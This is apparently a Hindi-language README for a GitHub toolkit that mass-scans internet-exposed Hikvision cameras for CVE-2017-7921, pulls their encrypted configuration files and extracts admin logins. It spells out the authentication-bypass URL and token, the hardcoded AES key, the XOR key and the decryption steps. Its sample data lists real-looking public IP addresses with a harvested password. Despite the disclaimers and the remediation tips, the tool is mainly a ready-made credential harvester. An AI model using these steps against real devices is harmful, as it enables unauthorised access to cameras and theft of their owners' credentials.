
CVE-2017-7921-Research-Toolkit GUI
FOFA की सहायता से Hikvision के CVE-2017-7921 भेद्यता का तेज़ी से परीक्षण करने के लिए उपयोग किया जाता है, तथा लॉगिन खाता और पासवर्ड प्रदान करता है और json फ़ाइल आउटपुट करता है।
CVE-2017-7921 अनुसंधान टूलकिट
सुरक्षा घोषणा: यह टूल केवल अधिकृत सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए है
विषय-सूची
- कानूनी और नैतिक घोषणा
- परियोजना विवरण
- विशेषताएँ
- स्थापना निर्देश
- उपयोग विधि
- आउटपुट परिणाम
- सुरक्षा और सुधार सुझाव
- तकनीकी विवरण
- आभार
⚖️ कानूनी और नैतिक घोषणा
महत्वपूर्ण सूचना: इस टूल का उपयोग करने का अर्थ है कि आप निम्नलिखित शर्तों से सहमत हैं
- केवल अधिकृत परीक्षण: केवल उन प्रणालियों के लिए जिनके लिए आपके पास स्पष्ट लिखित प्राधिकरण है
- कानून का पालन: साइबर सुरक्षा कानून और स्थानीय प्रासंगिक कानूनों का कड़ाई से पालन करें
- जिम्मेदार प्रकटीकरण: भेद्यता मिलने पर आधिकारिक चैनलों के माध्यम से विक्रेता को रिपोर्ट करें
- शैक्षिक उद्देश्य: इस टूल का उद्देश्य IoT सुरक्षा जागरूकता बढ़ाना है
- जोखिम स्वयं वहन करें: इस टूल के दुरुपयोग से उत्पन्न कानूनी परिणामों की जिम्मेदारी उपयोगकर्ता की होगी
यह परियोजना GitHub सुरक्षा अनुसंधान नीति और Hikvision सुरक्षा प्रतिक्रिया केंद्र के प्रकटीकरण मानदंडों का पालन करती है।
📖 परियोजना विवरण
Hikvision IP कैमरों में CVE-2017-7921 प्रमाणीकरण बायपास भेद्यता के लिए बल्क डिटेक्शन और सत्यापन टूल, जो कॉन्फ़िगरेशन फ़ाइलों के स्वचालित डिक्रिप्शन और क्रेडेंशियल निष्कर्षण का समर्थन करता है।
डिज़ाइन लक्ष्य
- सुरक्षा शोधकर्ताओं को बड़े पैमाने पर उपकरणों की सुरक्षा स्थिति का आकलन करने में सहायता करें
- डिवाइस मालिकों को स्व-निरीक्षण क्षमता प्रदान करें
- सुधार अनुशंसा रिपोर्ट उत्पन्न करने का समर्थन करें
- IoT डिवाइस सुरक्षा उन्नयन को बढ़ावा दें
✨ विशेषताएँ
- ✅ JSON प्रारूप में डिवाइस सूची का बल्क स्कैन
- ✅ मल्टी-थ्रेडेड समवर्ती जांच (कॉन्फ़िगर करने योग्य थ्रेड गणना)
- ✅ एन्क्रिप्टेड कॉन्फ़िगरेशन फ़ाइलों का स्वचालित डाउनलोड
- ✅ वास्तविक समय में डिक्रिप्ट करें और लॉगिन क्रेडेंशियल निकालें
- ✅ वास्तविक समय में स्कैन प्रगति प्रदर्शन (tqdm)
- ✅ परिणाम स्वचालित रूप से JSON रिपोर्ट के रूप में सहेजे जाते हैं
- ✅ बाधित होने के बाद स्कैन जारी रखने का समर्थन
🛠️ स्थापना निर्देश
पर्यावरण आवश्यकताएँ
- Python 3.7 या उच्चतर संस्करण
- केवल Linux / macOS समर्थित (Windows पर कुछ सुविधाएँ सीमित हैं)
निर्भरता स्थापना
git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requirements.txt सामग्री
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
📊 उपयोग विधि
1. डिवाइस डेटा फ़ाइल तैयार करें
टूल निर्देशिका में zc/ फ़ोल्डर बनाएं, डिवाइस सूची को JSON प्रारूप में रखें (प्रत्येक पंक्ति में एक डिवाइस ऑब्जेक्ट):
mkdir zc
फ़ाइल उदाहरण: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
फ़ील्ड विवरण:
| फ़ील्ड | विवरण | आवश्यक |
|---|---|---|
link | डिवाइस HTTP/HTTPS एक्सेस पता | ✅ हाँ |
city | शहर की जानकारी | ❌ नहीं |
country | देश कोड | ❌ नहीं |
org | संगठन/ISP जानकारी | ❌ नहीं |
2. स्कैन टूल चलाएं
python batch_decrypt.py
3. इंटरैक्टिव संचालन उदाहरण
════════════════════════════════════════════════════════════════════════════════
Hikvision कैमरा कॉन्फ़िगरेशन फ़ाइल भेद्यता बल्क स्कैन टूल
════════════════════════════════════════════════════════════════════════════════
उपलब्ध JSON फ़ाइलें:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 बाइट्स)
════════════════════════════════════════════════════════════════════════════════
कृपया फ़ाइल नंबर चुनें: 1
चयनित फ़ाइल: devices_2025.json
डिवाइस डेटा लोड हो रहा है...
स्कैन किए जाने वाले कुल डिवाइस: 2000
कृपया समवर्ती थ्रेड गणना दर्ज करें (डिफ़ॉल्ट: 5): 10
समवर्ती थ्रेड गणना: 10
स्कैन प्रारंभ...
कुल स्कैन किए गए डिवाइस: 2000
भेद्य डिवाइसों की संख्या मिली: 127
भेद्य डिवाइस सहेजे गए: vulnerable_devices.json
📁 आउटपुट परिणाम
स्कैन पूर्ण होने पर vulnerable_devices.json उत्पन्न होता है, जिसमें सभी भेद्य डिवाइसों की जानकारी होती है।
उदाहरण आउटपुट:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
🛡️ सुरक्षा और सुधार सुझाव
डिवाइस मालिकों के लिए
- तुरंत फर्मवेयर अपग्रेड करें: नवीनतम संस्करण डाउनलोड करने के लिए Hikvision आधिकारिक वेबसाइट पर जाएं
- डिफ़ॉल्ट पासवर्ड बदलें: अपग्रेड करने के बाद भी डिफ़ॉल्ट admin पासवर्ड बदलना चाहिए
- नेटवर्क अलगाव: कैमरों को अलग VLAN में तैनात करें, सार्वजनिक नेटवर्क से सीधी पहुँच प्रतिबंधित करें
- IP व्हाइटलिस्ट सक्षम करें: केवल विश्वसनीय IP को प्रबंधन इंटरफ़ेस तक पहुँच की अनुमति दें
सुरक्षा पेशेवरों के लिए
- स्कैन परिणाम गोपनीय रखें: अनपैच किए गए डिवाइसों की विस्तृत जानकारी लीक न करें
- सुधार में सहायता करें: तकनीकी सहायता के लिए डिवाइस मालिकों से सक्रिय रूप से संपर्क करें
- अनुपालन रिपोर्ट: ISO 27001 मानक के अनुरूप सुरक्षा मूल्यांकन रिपोर्ट उत्पन्न करें
🔬 तकनीकी विवरण
भेद्यता सिद्धांत
- प्रमाणीकरण बायपास:
/System/configurationFile?auth=YWRtaW46MTEKहार्डकोडेड क्रेडेंशियल का उपयोग करता है - कमजोर एन्क्रिप्शन: कॉन्फ़िगरेशन फ़ाइलें निश्चित AES-ECB कुंजी के साथ एन्क्रिप्ट की जाती हैं
- कुंजी रिसाव: कुंजी
279977f62f6cfd2d91cd75b889ce0c9aफर्मवेयर में हार्डकोडेड है
एन्क्रिप्शन प्रक्रिया
- एन्क्रिप्टेड बाइनरी कॉन्फ़िगरेशन फ़ाइल प्राप्त करें
- AES-ECB डिक्रिप्शन (पहला ब्लॉक हटाएं)
- XOR ऑब्सफस्केशन (कुंजी:
0x73, 0x8B, 0x55, 0x44) - admin खाता और बाद के पासवर्ड फ़ील्ड निकालने के लिए रेगेक्स का उपयोग करें
📝 लाइसेंस
यह सॉफ़्टवेयर केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ताओं को यह सुनिश्चित करना चाहिए कि वे सभी लागू कानूनों का अनुपालन करते हैं।
🙏 आभार
- Hikvision को समय पर प्रतिक्रिया देने और फर्मवेयर अपडेट जारी करने के लिए धन्यवाद
- ओपन-सोर्स समुदाय द्वारा प्रदान की गई भेद्यता विश्लेषण सामग्री के लिए धन्यवाद
- यह परियोजना IoT सुरक्षा अनुसंधान सर्वोत्तम अभ्यास का पालन करती है
अंतिम अपडेट: 2025-01-29 | संस्करण: v1.0.0 | समर्थित CVE: CVE-2017-7921